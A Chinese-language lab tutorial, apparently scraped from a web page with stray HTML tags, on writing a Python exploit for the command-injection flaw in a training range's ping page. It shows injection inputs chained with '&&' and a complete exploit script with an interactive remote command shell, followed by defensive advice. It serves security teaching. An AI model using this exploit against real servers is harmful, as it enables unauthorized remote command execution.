Python编写第一个EXP教程<\/h1>

一、环境准备<\/h2>

1.1 靶场环境<\/h3>
使用DVWA或类似靶场的RCE漏洞环境（如文中提到的pakachu靶场的rce_ping靶场）<\/li>
靶场搭建教程可在网上搜索获取<\/li> <\/ul>
1.2 开发工具<\/h3>
PyCharm IDE（或其他Python开发环境）<\/li>
Python 3.x环境<\/li>
Burp Suite（用于抓包分析）<\/li> <\/ul>
二、漏洞分析<\/h2>

2.1 漏洞位置<\/h3>
靶场中存在一个ping功能，用户可输入IP地址进行ping测试<\/li>
查看源码文件
vul\/rce\/rec_ping.php<\/code>发现漏洞点<\/li>
<\/ul>
2.2 漏洞原理<\/h3>

用户可控的POST参数ipaddress<\/code>被直接带入shell_exec()<\/code>函数中<\/li>
未做任何过滤或转义，导致命令注入漏洞<\/li>
可通过&&<\/code>符号拼接执行任意系统命令<\/li>
<\/ul>
2.3 漏洞验证<\/h3>

输入127.0.0.1 && calc<\/code>可弹出计算器<\/li>
输入127.0.0.1 && echo "test"<\/code>可输出字符串<\/li>
<\/ol>
三、EXP编写步骤<\/h2>
3.1 抓包分析<\/h3>

使用Burp Suite拦截正常ping请求<\/li>
分析请求格式和参数<\/li>
<\/ol>
3.2 使用Copy As Python-Requests插件<\/h3>

在Burp Suite中右键选择插件"Copy As Python-Requests"<\/li>
将生成的Python代码复制到PyCharm中<\/li>
<\/ol>
3.3 简化请求头<\/h3>

删除不必要的HTTP头，保留最简形式：

Content-Type<\/code><\/li>
User-Agent<\/code>（可选）<\/li>
Cookie<\/code>（如有认证需要）<\/li>
<\/ul>
<\/li>
<\/ul>
3.4 构造EXP代码<\/h3>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>target_url =<\/span> "http:\/\/靶场地址\/vul\/rce\/rce_ping.php"<\/span>
<\/span><\/span>payload =<\/span> "127.0.0.1 && whoami"<\/span>  # 替换为要执行的命令<\/span>
<\/span><\/span>
<\/span><\/span>data =<\/span> {
<\/span><\/span>    "ipaddress"<\/span>: payload,
<\/span><\/span>    "submit"<\/span>: "submit"<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>response =<\/span> requests.<\/span>post(target_url, data=<\/span>data)
<\/span><\/span>print(response.<\/span>text)
<\/span><\/span><\/code><\/pre>3.5 功能扩展<\/h3>

添加命令交互功能：<\/li>
<\/ol>
while<\/span> True<\/span>:
<\/span><\/span>    cmd =<\/span> input("$ "<\/span>)
<\/span><\/span>    if<\/span> cmd.<\/span>lower() in<\/span> ['exit'<\/span>, 'quit'<\/span>]:
<\/span><\/span>        break<\/span>
<\/span><\/span>    payload =<\/span> f<\/span>"127.0.0.1 && <\/span>{<\/span>cmd}<\/span>"<\/span>
<\/span><\/span>    data["ipaddress"<\/span>] =<\/span> payload
<\/span><\/span>    response =<\/span> requests.<\/span>post(target_url, data=<\/span>data)
<\/span><\/span>    print(response.<\/span>text.<\/span>split("<pre>"<\/span>)[1<\/span>].<\/span>split("<\/pre>"<\/span>)[0<\/span>])  # 提取命令输出部分<\/span>
<\/span><\/span><\/code><\/pre>
添加错误处理：<\/li>
<\/ol>
try<\/span>:
<\/span><\/span>    response =<\/span> requests.<\/span>post(target_url, data=<\/span>data, timeout=<\/span>5<\/span>)
<\/span><\/span>    response.<\/span>raise_for_status()
<\/span><\/span>except<\/span> requests.<\/span>exceptions.<\/span>RequestException as<\/span> e:
<\/span><\/span>    print(f<\/span>"请求失败: <\/span>{<\/span>e}<\/span>"<\/span>)
<\/span><\/span><\/code><\/pre>四、EXP优化技巧<\/h2>
4.1 编码处理<\/h3>

对特殊字符进行URL编码：<\/li>
<\/ul>
from<\/span> urllib.parse import<\/span> quote
<\/span><\/span>payload =<\/span> "127.0.0.1 && "<\/span> +<\/span> quote("your_command"<\/span>)
<\/span><\/span><\/code><\/pre>4.2 结果提取<\/h3>

使用正则表达式或字符串分割提取命令输出结果<\/li>
<\/ul>
4.3 多线程\/协程<\/h3>

对于批量检测可使用多线程提高效率<\/li>
<\/ul>
4.4 参数化配置<\/h3>

将目标URL、命令前缀等提取为可配置参数<\/li>
<\/ul>
五、防御建议<\/h2>


输入验证：<\/p>

使用正则表达式严格限制输入格式（仅允许IP地址格式）<\/li>
<\/ul>
<\/li>

使用安全函数：<\/p>

替换shell_exec()<\/code>为更安全的函数<\/li>
使用escapeshellarg()<\/code>对参数进行转义<\/li>
<\/ul>
<\/li>

最小权限原则：<\/p>

Web服务器以低权限用户运行<\/li>
<\/ul>
<\/li>

禁用危险函数：<\/p>

在php.ini中禁用shell_exec()<\/code>等危险函数<\/li>
<\/ul>
<\/li>
<\/ol>
六、完整EXP示例<\/h2>
#!\/usr\/bin\/env python3<\/span>
<\/span><\/span>import<\/span> requests
<\/span><\/span>import<\/span> urllib.parse
<\/span><\/span>import<\/span> argparse
<\/span><\/span>
<\/span><\/span>def<\/span> exploit<\/span>(target_url, command):
<\/span><\/span>    """
<\/span><\/span><\/span>    执行命令注入漏洞利用
<\/span><\/span><\/span>    :param target_url: 目标URL
<\/span><\/span><\/span>    :param command: 要执行的命令
<\/span><\/span><\/span>    :return: 命令执行结果
<\/span><\/span><\/span>    """<\/span>
<\/span><\/span>    # 编码特殊字符<\/span>
<\/span><\/span>    payload =<\/span> f<\/span>"127.0.0.1 && <\/span>{<\/span>urllib.<\/span>parse.<\/span>quote(command)}<\/span>"<\/span>
<\/span><\/span>    
<\/span><\/span>    data =<\/span> {
<\/span><\/span>        "ipaddress"<\/span>: payload,
<\/span><\/span>        "submit"<\/span>: "submit"<\/span>
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    try<\/span>:
<\/span><\/span>        response =<\/span> requests.<\/span>post(
<\/span><\/span>            target_url,
<\/span><\/span>            data=<\/span>data,
<\/span><\/span>            timeout=<\/span>10<\/span>,
<\/span><\/span>            headers=<\/span>{
<\/span><\/span>                "User-Agent"<\/span>: "Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36"<\/span>
<\/span><\/span>            }
<\/span><\/span>        )
<\/span><\/span>        response.<\/span>raise_for_status()
<\/span><\/span>        
<\/span><\/span>        # 提取命令输出部分（根据实际页面结构调整）<\/span>
<\/span><\/span>        if<\/span> "<pre>"<\/span> in<\/span> response.<\/span>text:
<\/span><\/span>            return<\/span> response.<\/span>text.<\/span>split("<pre>"<\/span>)[1<\/span>].<\/span>split("<\/pre>"<\/span>)[0<\/span>].<\/span>strip()
<\/span><\/span>        return<\/span> response.<\/span>text
<\/span><\/span>    except<\/span> requests.<\/span>exceptions.<\/span>RequestException as<\/span> e:
<\/span><\/span>        return<\/span> f<\/span>"请求失败: <\/span>{<\/span>e}<\/span>"<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> interactive_shell<\/span>(target_url):
<\/span><\/span>    """
<\/span><\/span><\/span>    交互式命令执行shell
<\/span><\/span><\/span>    :param target_url: 目标URL
<\/span><\/span><\/span>    """<\/span>
<\/span><\/span>    print("[+] 进入交互式shell (输入exit或quit退出)"<\/span>)
<\/span><\/span>    while<\/span> True<\/span>:
<\/span><\/span>        try<\/span>:
<\/span><\/span>            cmd =<\/span> input("$ "<\/span>)
<\/span><\/span>            if<\/span> cmd.<\/span>lower() in<\/span> ['exit'<\/span>, 'quit'<\/span>]:
<\/span><\/span>                break<\/span>
<\/span><\/span>            if<\/span> not<\/span> cmd.<\/span>strip():
<\/span><\/span>                continue<\/span>
<\/span><\/span>                
<\/span><\/span>            result =<\/span> exploit(target_url, cmd)
<\/span><\/span>            print(result)
<\/span><\/span>        except<\/span> KeyboardInterrupt<\/span>:
<\/span><\/span>            print("<\/span>\n<\/span>[!] 用户中断"<\/span>)
<\/span><\/span>            break<\/span>
<\/span><\/span>        except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>            print(f<\/span>"[!] 错误: <\/span>{<\/span>e}<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    parser =<\/span> argparse.<\/span>ArgumentParser(description=<\/span>"RCE漏洞利用工具"<\/span>)
<\/span><\/span>    parser.<\/span>add_argument("-u"<\/span>, "--url"<\/span>, required=<\/span>True<\/span>, help=<\/span>"目标URL"<\/span>)
<\/span><\/span>    parser.<\/span>add_argument("-c"<\/span>, "--command"<\/span>, help=<\/span>"要执行的命令"<\/span>)
<\/span><\/span>    args =<\/span> parser.<\/span>parse_args()
<\/span><\/span>    
<\/span><\/span>    if<\/span> args.<\/span>command:
<\/span><\/span>        print(exploit(args.<\/span>url, args.<\/span>command))
<\/span><\/span>    else<\/span>:
<\/span><\/span>        interactive_shell(args.<\/span>url)
<\/span><\/span><\/code><\/pre>七、总结<\/h2>


通过本教程可以学习到：<\/p>

如何分析简单的RCE漏洞<\/li>
使用Python编写基础EXP的方法<\/li>
如何优化和扩展EXP功能<\/li>
<\/ul>
<\/li>

进一步学习方向：<\/p>

学习更复杂的漏洞利用技术<\/li>
研究各种Web安全漏洞的利用方式<\/li>
掌握Python网络编程和安全工具开发<\/li>
<\/ul>
<\/li>

注意事项：<\/p>

仅用于合法授权的安全测试<\/li>
实际渗透测试中需获得书面授权<\/li>
遵守当地法律法规<\/li>
<\/ul>
<\/li>
<\/ol>